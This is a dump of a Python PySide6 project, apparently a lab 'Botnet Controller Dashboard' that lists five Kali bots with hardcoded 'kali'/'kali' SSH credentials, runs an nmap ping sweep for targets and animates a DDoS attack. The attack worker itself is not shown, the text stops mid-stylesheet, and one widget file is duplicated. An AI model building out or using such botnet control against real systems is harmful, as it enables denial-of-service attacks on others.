botnet_controller
        |---widgets 
        |      |---__init__.py 
        |      |---modern_gauge.py 
        |      |---network_chart.py
        |      |---network_topology.py
        |      |---square_logo.py
        |---config.py
        |---main.py
        |---models.py
        |---workers.py

widgets\__init__.py
# widgets/__init__.py
# -*- coding: utf-8 -*-
from .network_topology import NetworkTopologyView
from .modern_gauge import ModernGauge
from .network_chart import EnhancedNetworkChart
from .square_logo import SquareLogo

------------------------------------------------------------------------------------------------------------------------------------
widgets\modern_gauge.py
# widgets/modern_gauge.py
# -*- coding: utf-8 -*-
from PySide6.QtCore import Qt, QTimer
from PySide6.QtGui import QPainter, QFont, QColor, QLinearGradient
from PySide6.QtWidgets import QWidget

class ModernGauge(QWidget):
    def __init__(self, label="CPU", color=QColor("#00e09d"), parent=None):
        super().__init__(parent)
        self._value = 0
        self._label = label
        self._color = color
        self._bg = QColor("#071723")
        self._track = QColor("#18343f")
        self.setMinimumSize(220, 50)

        # สำหรับไฟกระพริบ
        self._flash = False
        self._flash_timer = QTimer(self)
        self._flash_timer.timeout.connect(self._toggle_flash)

    def _toggle_flash(self):
        self._flash = not self._flash
        self.update()

    def setValue(self, v: int):
        v = max(0, min(100, int(v)))
        if v != self._value:
            self._value = v

            # ถ้าเกิน 90% ให้เริ่มไฟกระพริบ
            if self._value >= 90:
                if not self._flash_timer.isActive():
                    self._flash_timer.start(400)  # กระพริบทุก 0.4 วินาที
            else:
                if self._flash_timer.isActive():
                    self._flash_timer.stop()
                    self._flash = False

            self.update()

    def paintEvent(self, _):
        w, h = self.width(), self.height()
        p = QPainter(self)
        p.setRenderHint(QPainter.Antialiasing)

        try:
            # พื้นหลังแบบ gradient
            bg_grad = QLinearGradient(0, 0, w, h)
            bg_grad.setColorAt(0, QColor(8, 18, 28))
            bg_grad.setColorAt(1, QColor(12, 26, 36))
            p.fillRect(self.rect(), bg_grad)

            # Track (เหลี่ยม ไม่โค้งมน)
            bar_height = h * 0.5
            bar_y = (h - bar_height) / 2
            p.setBrush(self._track)
            p.setPen(Qt.NoPen)
            p.drawRect(10, bar_y, w - 20, bar_height)

            # Value bar
            val_width = (w - 20) * (self._value / 100)
            bar_color = self._color

            # ถ้าเกิน 90% ให้เปลี่ยนสีหรือกระพริบ
            if self._value >= 90:
                if self._flash:
                    bar_color = QColor("#ff1e1e")  # แดงเตือน
                else:
                    bar_color = QColor("#ff4d4d")

            p.setBrush(bar_color)
            p.drawRect(10, bar_y, val_width, bar_height)

            # ขอบ glowing ถ้าเกิน 90%
            if self._value >= 90:
                p.setPen(QColor("#ff1e1e") if self._flash else QColor("#ff8080"))
                p.drawRect(9, bar_y - 1, w - 18, bar_height + 2)
                p.setPen(Qt.NoPen)

            # Label text
            p.setPen(QColor("#7ef0c7") if self._label.upper() == "CPU" else QColor("#9ee7ff"))
            p.setFont(QFont("Segoe UI", 10, QFont.Bold))
            p.drawText(12, int(bar_y - 4), self._label)

            # Percentage text
            percent_text = f"{self._value}%"
            p.setPen(Qt.white)
            p.setFont(QFont("Segoe UI", 10, QFont.Bold))
            tw = p.fontMetrics().horizontalAdvance(percent_text)
            p.drawText(w - tw - 12, int(h/2 + p.fontMetrics().ascent()/3), percent_text)
        finally:
            p.end()

------------------------------------------------------------------------------------------------------------------------------------
widgets\network_chart.py
# widgets/network_chart.py
# -*- coding: utf-8 -*-
import collections
from PySide6.QtCore import QPointF
from PySide6.QtGui import QPainter, QFont, QColor, QPen, QPolygonF, QLinearGradient
from PySide6.QtWidgets import QWidget
import psutil

class EnhancedNetworkChart(QWidget):
    def __init__(self, parent=None):
        super().__init__(parent)
        self.setMinimumHeight(160)
        self.history = collections.deque(maxlen=60)
        self._prev = psutil.net_io_counters()
        # Pre-fill zeros to avoid drawing issues
        for _ in range(10):
            self.history.append((0.0, 0.0))

    def step(self):
        now = psutil.net_io_counters()
        dt_tx = max(0, now.bytes_sent - self._prev.bytes_sent) / 1024 / 1024
        dt_rx = max(0, now.bytes_recv - self._prev.bytes_recv) / 1024 / 1024
        self._prev = now
        self.history.append((dt_tx, dt_rx))
        self.update()

    def paintEvent(self, _):
        p = QPainter(self)
        p.setRenderHint(QPainter.Antialiasing)
        try:
            rect = self.rect().adjusted(12, 12, -12, -12)
            bg_grad = QLinearGradient(0, 0, 0, self.height())
            bg_grad.setColorAt(0, QColor(8, 20, 30))
            bg_grad.setColorAt(1, QColor(12, 28, 40))
            p.fillRect(self.rect(), bg_grad)

            # Grid
            p.setPen(QPen(QColor(40, 60, 80, 100), 1))
            for i in range(1, 6):
                y = rect.top() + i * rect.height() / 6
                p.drawLine(rect.left(), int(y), rect.right(), int(y))
            for i in range(1, 8):
                x = rect.left() + i * rect.width() / 8
                p.drawLine(int(x), rect.top(), int(x), rect.bottom())

            p.setPen(QColor("#9bff57"))
            p.setFont(QFont("Segoe UI", 10, QFont.Bold))
            p.drawText(rect.left() + 6, rect.top() - 2 + p.fontMetrics().ascent(), "NETWORK")

            if not self.history:
                return

            maxv = max(max(tx, rx) for tx, rx in self.history) or 1.0

            def map_series(values):
                pts = []
                for i, v in enumerate(values):
                    x = rect.left() + (i / (len(values) - 1 or 1)) * rect.width()
                    y = rect.bottom() - (v / maxv) * rect.height()
                    pts.append(QPointF(x, y))
                return pts

            tx = [a for a, _ in self.history]
            rx = [b for _, b in self.history]

            p.setPen(QPen(QColor("#ffd166"), 2))
            if len(tx) > 1:
                p.drawPolyline(QPolygonF(map_series(tx)))
            p.setPen(QPen(QColor("#56ccf2"), 2))
            if len(rx) > 1:
                p.drawPolyline(QPolygonF(map_series(rx)))
        finally:
            p.end()

------------------------------------------------------------------------------------------------------------------------------------
widgets\network_topology.py
import subprocess
from PySide6.QtCore import QTimer, Qt, QPointF
from PySide6.QtGui import QPixmap, QPainter, QPen, QColor, QPolygonF, QLinearGradient
from PySide6.QtWidgets import (
    QGraphicsView, QGraphicsScene, QGraphicsPixmapItem,
    QGraphicsTextItem, QGraphicsLineItem, QGraphicsEllipseItem,
    QGraphicsPolygonItem
)
import os, random

class NetworkTopologyView(QGraphicsView):
    def __init__(self, bots, parent=None):
        super().__init__(parent)
        self.bots = bots
        self.scene = QGraphicsScene(self)
        self.setScene(self.scene)
        self.setRenderHint(QPainter.Antialiasing)

        self.timer = QTimer(self)
        self.timer.timeout.connect(self.update_animation)

        self.status_timer = QTimer(self)              # <- timer สำหรับเช็คสถานะบอท
        self.status_timer.timeout.connect(self.update_bot_status)
        self.status_timer.start(5000)  # ทุกๆ 5 วินาที

        self.is_attacking = False
        self.particles = []
        self.particle_speed = 10
        self.target_url = "Target Server"
        self.setup_scene()

    def set_target(self, target):
        """Set the target server URL and refresh the scene."""
        self.target_url = target if target else "Target Server"
        self.scene.clear()
        self.setup_scene()

    def set_bots(self, bots):
        self.bots = bots
        self.scene.clear()
        self.setup_scene()

    def update_bot_status(self):
        """Ping แต่ละบอท ถ้าตอบสนอง -> ok, ไม่ตอบ -> timeout"""
        for bot in self.bots:
            try:
                # สำหรับ Windows ใช้ "-n 1", Linux ใช้ "-c 1"
                param = "-n" if os.name == "nt" else "-c"
                result = subprocess.run(
                    ["ping", param, "1", bot.ip],
                    stdout=subprocess.DEVNULL,
                    stderr=subprocess.DEVNULL
                )
                if result.returncode == 0:
                    bot.status = "ok"
                else:
                    bot.status = "timeout"
            except Exception:
                bot.status = "timeout"

        # รีเฟรช scene ให้ dot เปลี่ยนสี
        self.scene.clear()
        self.setup_scene()

    def setup_scene(self):
        self.scene.clear()
        self.scene.setSceneRect(-300, -300, 600, 600)

        # Add background gradient (similar to network_chart.py)
        bg_rect = self.scene.addRect(-300, -300, 600, 600)
        bg_grad = QLinearGradient(-300, -300, -300, 300)
        bg_grad.setColorAt(0, QColor(8, 20, 30))
        bg_grad.setColorAt(1, QColor(12, 28, 40))
        bg_rect.setBrush(bg_grad)
        bg_rect.setPen(Qt.NoPen)

        # Add grid (similar to network_chart.py)
        grid_color = QColor(40, 60, 80, 100)  # Light gray with transparency
        grid_pen = QPen(grid_color, 1)

        # Horizontal grid lines
        for i in range(1, 6):
            y = -300 + i * 600 / 6
            line = QGraphicsLineItem(-300, y, 300, y)
            line.setPen(grid_pen)
            self.scene.addItem(line)

        # Vertical grid lines
        for i in range(1, 8):
            x = -300 + i * 600 / 8
            line = QGraphicsLineItem(x, -300, x, 300)
            line.setPen(grid_pen)
            self.scene.addItem(line)

        base_path = os.path.dirname(__file__)

        # Target server (right)
        server_item = QGraphicsPixmapItem()
        server_path = os.path.join(base_path, "icon\server.png")
        server_pixmap = QPixmap(server_path)
        if server_pixmap.isNull():
            server_pixmap = QPixmap(50, 50)
            server_pixmap.fill(QColor("#ff0000"))
        server_item.setPixmap(server_pixmap.scaled(50, 50, Qt.KeepAspectRatio, Qt.SmoothTransformation))
        server_item.setPos(175, -25)
        self.scene.addItem(server_item)

        server_label = QGraphicsTextItem(self.target_url)
        server_label.setDefaultTextColor(QColor("#ffffff"))
        server_label.setPos(155, -55)
        self.scene.addItem(server_label)

        # Bot nodes
        bot_spacing = 80
        total_bots = len(self.bots)
        start_y = -((total_bots - 1) * bot_spacing) / 2
        for i, bot in enumerate(self.bots):
            x = -200
            y = start_y + i * bot_spacing

            # Bot icon
            bot_item = QGraphicsPixmapItem()
            bot_item.setPixmap(QPixmap(os.path.join(base_path, "icon/bot.png")).scaled(60, 60, Qt.KeepAspectRatio))
            bot_item.setPos(x - 35, y - 30)
            self.scene.addItem(bot_item)

            # IP label
            label = QGraphicsTextItem(bot.ip)
            label.setDefaultTextColor(QColor("#ffffff"))
            label.setPos(x + 20, y - 10)
            self.scene.addItem(label)

            # Line from bot → server with bend
            line_start_x = x + 110  # Start right after IP label
            line_start_y = y
            bend_x = line_start_x + 100  # Straight section length
            bend_y = line_start_y
            end_x = 175  # Target server x position
            end_y = 0  # Target server y position (adjusted for alignment)
            line1 = QGraphicsLineItem(line_start_x, line_start_y, bend_x, bend_y)
            line1.setPen(QPen(QColor("#ffffff"), 2))
            self.scene.addItem(line1)
            line2 = QGraphicsLineItem(bend_x, bend_y, end_x, end_y)
            line2.setPen(QPen(QColor("#ffffff"), 2))
            self.scene.addItem(line2)

            # Connection status dot near the start of the line
            dot_x = line_start_x + 10  # Close to the start of the line
            dot_y = line_start_y
            dot = QGraphicsEllipseItem(dot_x - 6, dot_y - 6, 12, 12)
            dot.setBrush(QColor("green") if bot.status.lower() in ("attack", "ok") else QColor("red"))
            dot.setPen(QPen(Qt.NoPen))
            self.scene.addItem(dot)

            # Particle track init
            if self.is_attacking:
                self.particles.append({
                    "start": QPointF(line_start_x, line_start_y),
                    "bend": QPointF(bend_x, bend_y),
                    "end": QPointF(end_x, end_y),
                    "progress": random.random()
                })

    def start_animation(self):
        self.is_attacking = True
        self.particles = []
        self.setup_scene()
        self.timer.start(50)

    def stop_animation(self):
        self.is_attacking = False
        self.particles = []
        self.setup_scene()
        self.timer.stop()

    def update_animation(self):
        if not self.is_attacking:
            return

        # อัพเดทตำแหน่ง particle
        new_particles = []
        for p in self.particles:
            p["progress"] += self.particle_speed / 200.0
            if p["progress"] >= 1:
                p["progress"] = 0
            new_particles.append(p)
        self.particles = new_particles

        self.scene.clear()
        self.setup_scene()

        # วาด particle เป็นสามเหลี่ยม
        for p in self.particles:
            if p["progress"] < 0.5:  # First half: move from start to bend
                progress = p["progress"] * 2  # Scale progress to 0-1 for this segment
                x = p["start"].x() + (p["bend"].x() - p["start"].x()) * progress
                y = p["start"].y() + (p["bend"].y() - p["start"].y()) * progress
            else:  # Second half: move from bend to end
                progress = (p["progress"] - 0.5) * 2  # Scale progress to 0-1 for this segment
                x = p["bend"].x() + (p["end"].x() - p["bend"].x()) * progress
                y = p["bend"].y() + (p["end"].y() - p["bend"].y()) * progress

            triangle = QPolygonF([
                QPointF(x, y-3),
                QPointF(x+8, y),
                QPointF(x, y+3)
            ])
            tri_item = QGraphicsPolygonItem(triangle)
            tri_item.setBrush(QColor("#f93a3a"))
            tri_item.setPen(QPen(Qt.NoPen))
            self.scene.addItem(tri_item)

------------------------------------------------------------------------------------------------------------------------------------
widgets\network_topology.py
import subprocess
from PySide6.QtCore import QTimer, Qt, QPointF
from PySide6.QtGui import QPixmap, QPainter, QPen, QColor, QPolygonF, QLinearGradient
from PySide6.QtWidgets import (
    QGraphicsView, QGraphicsScene, QGraphicsPixmapItem,
    QGraphicsTextItem, QGraphicsLineItem, QGraphicsEllipseItem,
    QGraphicsPolygonItem
)
import os, random

class NetworkTopologyView(QGraphicsView):
    def __init__(self, bots, parent=None):
        super().__init__(parent)
        self.bots = bots
        self.scene = QGraphicsScene(self)
        self.setScene(self.scene)
        self.setRenderHint(QPainter.Antialiasing)

        self.timer = QTimer(self)
        self.timer.timeout.connect(self.update_animation)

        self.status_timer = QTimer(self)              # <- timer สำหรับเช็คสถานะบอท
        self.status_timer.timeout.connect(self.update_bot_status)
        self.status_timer.start(5000)  # ทุกๆ 5 วินาที

        self.is_attacking = False
        self.particles = []
        self.particle_speed = 10
        self.target_url = "Target Server"
        self.setup_scene()

    def set_target(self, target):
        """Set the target server URL and refresh the scene."""
        self.target_url = target if target else "Target Server"
        self.scene.clear()
        self.setup_scene()

    def set_bots(self, bots):
        self.bots = bots
        self.scene.clear()
        self.setup_scene()

    def update_bot_status(self):
        """Ping แต่ละบอท ถ้าตอบสนอง -> ok, ไม่ตอบ -> timeout"""
        for bot in self.bots:
            try:
                # สำหรับ Windows ใช้ "-n 1", Linux ใช้ "-c 1"
                param = "-n" if os.name == "nt" else "-c"
                result = subprocess.run(
                    ["ping", param, "1", bot.ip],
                    stdout=subprocess.DEVNULL,
                    stderr=subprocess.DEVNULL
                )
                if result.returncode == 0:
                    bot.status = "ok"
                else:
                    bot.status = "timeout"
            except Exception:
                bot.status = "timeout"

        # รีเฟรช scene ให้ dot เปลี่ยนสี
        self.scene.clear()
        self.setup_scene()

    def setup_scene(self):
        self.scene.clear()
        self.scene.setSceneRect(-300, -300, 600, 600)

        # Add background gradient (similar to network_chart.py)
        bg_rect = self.scene.addRect(-300, -300, 600, 600)
        bg_grad = QLinearGradient(-300, -300, -300, 300)
        bg_grad.setColorAt(0, QColor(8, 20, 30))
        bg_grad.setColorAt(1, QColor(12, 28, 40))
        bg_rect.setBrush(bg_grad)
        bg_rect.setPen(Qt.NoPen)

        # Add grid (similar to network_chart.py)
        grid_color = QColor(40, 60, 80, 100)  # Light gray with transparency
        grid_pen = QPen(grid_color, 1)

        # Horizontal grid lines
        for i in range(1, 6):
            y = -300 + i * 600 / 6
            line = QGraphicsLineItem(-300, y, 300, y)
            line.setPen(grid_pen)
            self.scene.addItem(line)

        # Vertical grid lines
        for i in range(1, 8):
            x = -300 + i * 600 / 8
            line = QGraphicsLineItem(x, -300, x, 300)
            line.setPen(grid_pen)
            self.scene.addItem(line)

        base_path = os.path.dirname(__file__)

        # Target server (right)
        server_item = QGraphicsPixmapItem()
        server_path = os.path.join(base_path, "icon\server.png")
        server_pixmap = QPixmap(server_path)
        if server_pixmap.isNull():
            server_pixmap = QPixmap(50, 50)
            server_pixmap.fill(QColor("#ff0000"))
        server_item.setPixmap(server_pixmap.scaled(50, 50, Qt.KeepAspectRatio, Qt.SmoothTransformation))
        server_item.setPos(175, -25)
        self.scene.addItem(server_item)

        server_label = QGraphicsTextItem(self.target_url)
        server_label.setDefaultTextColor(QColor("#ffffff"))
        server_label.setPos(155, -55)
        self.scene.addItem(server_label)

        # Bot nodes
        bot_spacing = 80
        total_bots = len(self.bots)
        start_y = -((total_bots - 1) * bot_spacing) / 2
        for i, bot in enumerate(self.bots):
            x = -200
            y = start_y + i * bot_spacing

            # Bot icon
            bot_item = QGraphicsPixmapItem()
            bot_item.setPixmap(QPixmap(os.path.join(base_path, "icon/bot.png")).scaled(60, 60, Qt.KeepAspectRatio))
            bot_item.setPos(x - 35, y - 30)
            self.scene.addItem(bot_item)

            # IP label
            label = QGraphicsTextItem(bot.ip)
            label.setDefaultTextColor(QColor("#ffffff"))
            label.setPos(x + 20, y - 10)
            self.scene.addItem(label)

            # Line from bot → server with bend
            line_start_x = x + 110  # Start right after IP label
            line_start_y = y
            bend_x = line_start_x + 100  # Straight section length
            bend_y = line_start_y
            end_x = 175  # Target server x position
            end_y = 0  # Target server y position (adjusted for alignment)
            line1 = QGraphicsLineItem(line_start_x, line_start_y, bend_x, bend_y)
            line1.setPen(QPen(QColor("#ffffff"), 2))
            self.scene.addItem(line1)
            line2 = QGraphicsLineItem(bend_x, bend_y, end_x, end_y)
            line2.setPen(QPen(QColor("#ffffff"), 2))
            self.scene.addItem(line2)

            # Connection status dot near the start of the line
            dot_x = line_start_x + 10  # Close to the start of the line
            dot_y = line_start_y
            dot = QGraphicsEllipseItem(dot_x - 6, dot_y - 6, 12, 12)
            dot.setBrush(QColor("green") if bot.status.lower() in ("attack", "ok") else QColor("red"))
            dot.setPen(QPen(Qt.NoPen))
            self.scene.addItem(dot)

            # Particle track init
            if self.is_attacking:
                self.particles.append({
                    "start": QPointF(line_start_x, line_start_y),
                    "bend": QPointF(bend_x, bend_y),
                    "end": QPointF(end_x, end_y),
                    "progress": random.random()
                })

    def start_animation(self):
        self.is_attacking = True
        self.particles = []
        self.setup_scene()
        self.timer.start(50)

    def stop_animation(self):
        self.is_attacking = False
        self.particles = []
        self.setup_scene()
        self.timer.stop()

    def update_animation(self):
        if not self.is_attacking:
            return

        # อัพเดทตำแหน่ง particle
        new_particles = []
        for p in self.particles:
            p["progress"] += self.particle_speed / 200.0
            if p["progress"] >= 1:
                p["progress"] = 0
            new_particles.append(p)
        self.particles = new_particles

        self.scene.clear()
        self.setup_scene()

        # วาด particle เป็นสามเหลี่ยม
        for p in self.particles:
            if p["progress"] < 0.5:  # First half: move from start to bend
                progress = p["progress"] * 2  # Scale progress to 0-1 for this segment
                x = p["start"].x() + (p["bend"].x() - p["start"].x()) * progress
                y = p["start"].y() + (p["bend"].y() - p["start"].y()) * progress
            else:  # Second half: move from bend to end
                progress = (p["progress"] - 0.5) * 2  # Scale progress to 0-1 for this segment
                x = p["bend"].x() + (p["end"].x() - p["bend"].x()) * progress
                y = p["bend"].y() + (p["end"].y() - p["bend"].y()) * progress

            triangle = QPolygonF([
                QPointF(x, y-3),
                QPointF(x+8, y),
                QPointF(x, y+3)
            ])
            tri_item = QGraphicsPolygonItem(triangle)
            tri_item.setBrush(QColor("#f93a3a"))
            tri_item.setPen(QPen(Qt.NoPen))
            self.scene.addItem(tri_item)

------------------------------------------------------------------------------------------------------------------------------------
widgets\square_logo.py
# widgets/round_logo.py
# -*- coding: utf-8 -*-
from PySide6.QtGui import QPixmap
from PySide6.QtWidgets import QLabel

class SquareLogo(QLabel):
    def __init__(self, image_path: str, size=220, parent=None):
        super().__init__(parent)
        self.setFixedSize(size, size)
        self.setStyleSheet("background:white;")  # ไม่มี border-radius แล้ว
        pm = QPixmap(image_path)
        if not pm.isNull():
            self.setPixmap(pm)
        self.setScaledContents(True)  # ยืดภาพให้เต็มกรอบ

------------------------------------------------------------------------------------------------------------------------------------
config.py
# config.py
# -*- coding: utf-8 -*-
from models import Bot

BOTS = [
    Bot("192.168.18.61",  "kali", "kali", "Bot-1", "Attack"),
    Bot("192.168.18.31",  "kali", "kali", "Bot-2", "Attack"),
    Bot("192.168.18.21",  "kali", "kali", "Bot-3", "Attack"),
    Bot("192.168.18.204",  "kali", "kali", "Bot-4", "Attack"),
    Bot("192.168.18.189",  "kali", "kali", "Bot-5", "Attack"),
]

------------------------------------------------------------------------------------------------------------------------------------
main.py
# -*- coding: utf-8 -*-
import sys
import os
import subprocess
import re
import json
from typing import Optional, List
from PySide6.QtCore import QTimer, Qt, QLocale, QRectF, QPointF, Signal, QObject, QRunnable, QThreadPool, QThread
from PySide6.QtGui import QFont, QFontDatabase, QAction, QColor, QPainter, QPen, QBrush
from PySide6.QtWidgets import (
    QApplication, QWidget, QGridLayout, QGroupBox, QLabel, QLineEdit,
    QPushButton, QProgressBar, QPlainTextEdit, QHBoxLayout, QVBoxLayout, QComboBox,
    QListWidget, QListWidgetItem
)
from config import BOTS
from models import Bus
from workers import AttackWorker  # Use the robust worker from workers.py
from widgets.network_topology import NetworkTopologyView
from widgets.modern_gauge import ModernGauge
from widgets.network_chart import EnhancedNetworkChart
from widgets.square_logo import SquareLogo
from pathlib import Path
import psutil
import time
import paramiko
import random
import math

try:
    from PIL import Image
    PIL_AVAILABLE = True
except ImportError:
    PIL_AVAILABLE = False

class ScanWorker(QObject):
    log = Signal(str)
    scan_completed = Signal(list)

class NmapScanWorker(QRunnable):
    def __init__(self, network: str, bus: Bus):
        super().__init__()
        self.network = network
        self.bus = bus
        self.signals = ScanWorker()

    def run(self):
        try:
            cmd = ['nmap', '-sn', self.network]
            self.signals.log.emit(f"[{time.strftime('%H:%M:%S')}] Running Nmap scan: {' '.join(cmd)}")
            result = subprocess.run(cmd, capture_output=True, text=True, timeout=60)
            if result.returncode != 0:
                self.signals.log.emit(f"[{time.strftime('%H:%M:%S')}] Nmap scan failed: {result.stderr}")
                self.signals.scan_completed.emit([])
                return

            hosts = []
            ip_pattern = r'Nmap scan report for (\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})'
            ips = re.findall(ip_pattern, result.stdout)
            for ip in ips:
                hosts.append({"ip": ip, "status": "up"})
            self.signals.log.emit(f"[{time.strftime('%H:%M:%S')}] Scan completed. Found {len(hosts)} hosts: {', '.join([h['ip'] for h in hosts])}")
            self.signals.scan_completed.emit(hosts)
        except subprocess.TimeoutExpired:
            self.signals.log.emit(f"[{time.strftime('%H:%M:%S')}] Nmap scan timed out")
            self.signals.scan_completed.emit([])
        except Exception as e:
            self.signals.log.emit(f"[{time.strftime('%H:%M:%S')}] Nmap scan error: {e}")
            self.signals.scan_completed.emit([])

class AttackAnimationWidget(QWidget):
    """Custom widget for DDoS attack animation background"""
    def __init__(self, parent=None):
        super().__init__(parent)
        self.setAttribute(Qt.WA_TransparentForMouseEvents)
        self.setStyleSheet("background: rgba(0, 0, 0, 0.5);")  # Semi-transparent background
        self.particles = []
        self.timer = QTimer(self)
        self.timer.timeout.connect(self.update_particles)
        self.is_animating = False

        # Initialize particles
        self.init_particles()

    def init_particles(self):
        """Initialize particles for animation"""
        self.particles = []
        for _ in range(50):  # Number of particles
            self.particles.append({
                'pos': QPointF(random.uniform(0, self.width()), random.uniform(0, self.height())),
                'speed': random.uniform(2, 5),
                'angle': random.uniform(0, 2 * math.pi),
                'color': QColor(random.choice(['#ff4500', '#00ff88', '#ff0000'])),
                'size': random.uniform(2, 5),
                'blink': random.random()
            })

    def start_animation(self):
        """Start the animation"""
        self.is_animating = True
        self.timer.start(16)  # ~60 FPS
        self.show()

    def stop_animation(self):
        """Stop the animation"""
        self.is_animating = False
        self.timer.stop()
        self.hide()

    def update_particles(self):
        """Update particle positions and trigger repaint"""
        if not self.is_animating:
            return
        for particle in self.particles:
            # Update position
            particle['pos'] += QPointF(
                particle['speed'] * math.cos(particle['angle']),
                particle['speed'] * math.sin(particle['angle'])
            )
            # Bounce off edges
            if particle['pos'].x() < 0 or particle['pos'].x() > self.width():
                particle['angle'] = math.pi - particle['angle']
            if particle['pos'].y() < 0 or particle['pos'].y() > self.height():
                particle['angle'] = -particle['angle']
            # Update blink
            particle['blink'] = (particle['blink'] + 0.05) % 1
        self.update()

    def resizeEvent(self, event):
        """Reinitialize particles on resize to match new dimensions"""
        self.init_particles()
        super().resizeEvent(event)

    def paintEvent(self, event):
        """Paint particles to simulate DDoS attack"""
        painter = QPainter(self)
        painter.setRenderHint(QPainter.Antialiasing)
        for particle in self.particles:
            # Apply blinking effect
            alpha = int(255 * (0.5 + 0.5 * math.sin(particle['blink'] * 2 * math.pi)))
            color = particle['color']
            color.setAlpha(alpha)
            painter.setPen(QPen(color, 1))
            painter.setBrush(QBrush(color))
            painter.drawEllipse(particle['pos'], particle['size'], particle['size'])
            # Draw trailing line for packet effect
            end_pos = particle['pos'] - QPointF(
                particle['speed'] * math.cos(particle['angle']) * 5,
                particle['speed'] * math.sin(particle['angle']) * 5
            )
            painter.setPen(QPen(color, 1))
            painter.drawLine(particle['pos'], end_pos)
        painter.end()

class Main(QWidget):
    def __init__(self):
        super().__init__()
        self.setWindowTitle("Botnet Controller Dashboard (Cyberpunk)")
        self.resize(1200, 700)  # Adjusted size to avoid screen limit issues
        self.setMinimumSize(1162, 902)  # Set minimum size based on warning
        self.inputs = {}

        # Initialize attack animation widget
        self.attack_animation = AttackAnimationWidget(self)
        self.attack_animation.hide()  # Hidden by default

        # Initialize digital font
        self.dig_font = None
        for f in ("Digital-7.ttf", "DSEG7Classic-Bold.ttf", "calculator.ttf"):
            if os.path.exists(f):
                try:
                    fid = QFontDatabase.addApplicationFont(f)
                    fams = QFontDatabase.applicationFontFamilies(fid)
                    if fams:
                        self.dig_font = fams[0]
                        break
                except Exception as e:
                    print(f"Failed to load font {f}: {e}")

        # Event bus
        self.bus = Bus()

        self.connected_bots = []
        self.scanned_hosts = []  # List of {'ip': str, 'status': str}
        self.selected_target = ""  # Currently selected target IP

        # Layout
        grid = QGridLayout(self)
        grid.setSpacing(14)
        grid.setContentsMargins(12, 12, 12, 12)

        # Left column (topology, gauges, network)
        left_col = self.create_left_column()
        center_col = self.create_center_column()
        right_col = self.create_right_column()

        grid.addWidget(left_col, 0, 0)
        grid.addWidget(center_col, 0, 1)
        grid.addWidget(right_col, 0, 2)

        grid.setColumnStretch(0, 5)
        grid.setColumnStretch(1, 5)
        grid.setColumnStretch(2, 3)

        # Connect bus signals after UI is initialized
        self.bus.log.connect(self.append_log)
        self.bus.progress.connect(self.update_progress)
        self.bus.countdown.connect(self.update_countdown)
        self.bus.status.connect(self.on_worker_status)
        self.bus.metrics.connect(self.update_metrics)

        # Check if background image exists
        # In Main.__init__
        bg_path = os.path.join("logo.jpg").replace("\\", "/")
        current_dir = os.getcwd().replace("\\", "/")
        self.append_log(f"[{time.strftime('%H:%M:%S')}] Current working directory: {current_dir}")
        self.append_log(f"[{time.strftime('%H:%M:%S')}] Checking for background image at: {bg_path}")
        if not os.path.exists(bg_path):
            self.append_log(f"[{time.strftime('%H:%M:%S')}] Error: Could not find background image at {bg_path}")
            self.bg_style_normal = """
                background: qlineargradient(
                    x1:0, y1:0, x2:0, y2:1,
                    stop:0 #0a0a0a, stop:1 #1a237e
                );
            """
        else:
            try:
                file_size = os.path.getsize(bg_path)
                if PIL_AVAILABLE:
                    with Image.open(bg_path) as img:
                        width, height = img.size
                        format = img.format
                    self.append_log(f"[{time.strftime('%H:%M:%S')}] Background image found: {bg_path} ({file_size} bytes, {width}x{height}, format: {format})")
                else:
                    self.append_log(f"[{time.strftime('%H:%M:%S')}] Background image found: {bg_path} ({file_size} bytes, Pillow not installed)")
                self.bg_style_normal = f"""
                    background-image: url({bg_path});
                    background-position: center;
                    background-repeat: no-repeat;
                    background-attachment: fixed;
                    background-color: #0a0a0a;
                """
            except Exception as e:
                self.append_log(f"[{time.strftime('%H:%M:%S')}] Error loading background image: {e}")
                self.bg_style_normal = """
                    background: qlineargradient(
                        x1:0, y1:0, x2:0, y2:1,
                        stop:0 #0a0a0a, stop:1 #1a237e
                    );
                """

        # Cyberpunk theme with new color palette
        self.base_stylesheet = f"""
            Main {{
                background: qlineargradient(
                    x1:0, y1:0, x2:0, y2:1,
                    stop:0 #212121, stop:1 #212121
                );
            }}
            QGroupBox {{
                border: 3px solid #d7d4cf;
                margin-top: 14px;
                background: rgba(46, 46, 48, 0.9); /* #2e2e30 with opacity */
            }}
            QGroupBox::title {{
                subcontrol-origin: margin;
                subcontrol-position: top left;
                padding: 6px 12px;
                color: #d7d4cf;
                background: qlineargradient(
                    x1:0, y1:0, x2:1, y2:0,
                    stop:0 #ff3030, stop:1 #aa0000 /* Darkened red for gradient */
                );
                border: 2px solid #d7d4cf;
                margin-left: 12px;
                font-family: 'Consolas', monospace;
                font-weight: bold;
                font-size: 12px;
                text-transform: uppercase;
            }}
            QLineEdit {{
                background: #2e2e30;
                border: 2px solid #ff3030;
                padding: 8px 10px;
                color: #f8fa5b;
                font-family: 'Consolas', monospace;
                font-size: 12px;
            }}
            QLineEdit:focus {{
                border: 2px solid #f8fa5b;
                background: #aaaaaa;
            }}
            QLineEdit:disabled {{
                background: #4a4a4c;
                color: #aaaaaa;
                border: 2px solid #aaaaaa;
            }}
            QComboBox {{
                background: #2e2e30;
                border: 2px solid #ff3030;
                padding: 8px 10px;
                color: #f8fa5b;
                font-family: 'Consolas', monospace;
                font-size: 12px;
            }}
            QComboBox:hover {{
                border: 2px solid #f8fa5b;
            }}
            QComboBox::drop-down {{
                border: none;
            }}
            QComboBox QAbstractItemView {{
                background: #2e2e30;
                color: #f8fa5b;
                selection-background-color: #ff3030;
                selection-color: #f8fa5b;
            }}
            QListWidget {{
                background: #2e2e30;
                border: 2px solid #ff3030;
                color: #00ff88;
                font-family: 'Consolas', monospace;
                font-size: 11px;
            }}
            QListWidget::item:selected {{
                background: #ff3030;
                color: #f8fa5b;
            }}
            QPlainTextEdit {{
                background: #2e2e30;
                border: 2px solid #ff3030;
                padding: 8px;
                font-family: 'Consolas', monospace;
                font-size: 11px;
                color: #00ff88;
            }}
            QPushButton {{
                background: qlineargradient(
                    x1:0, y1:0, x2:0, y2:1,
                    stop:0 #ff3030, stop:1 #aa0000
                );
                color: #d7d4cf;
                border: 2px solid #ff3030;
                padding: 12px 14px;
                font-family: 'Consolas', monospace;
                font-weight: bold;
                font-size: 12px;
                text-transform: uppercase;
            }}
            QPushButton:hover {{
                background: qlineargradient(
                    x1:0, y1:0, x2:0, y2:1,
                    stop:0 #ff5050, stop:1 #cc0000
                );
                border: 2px solid #f8fa5b;
                color: #f8fa5b;
            }}
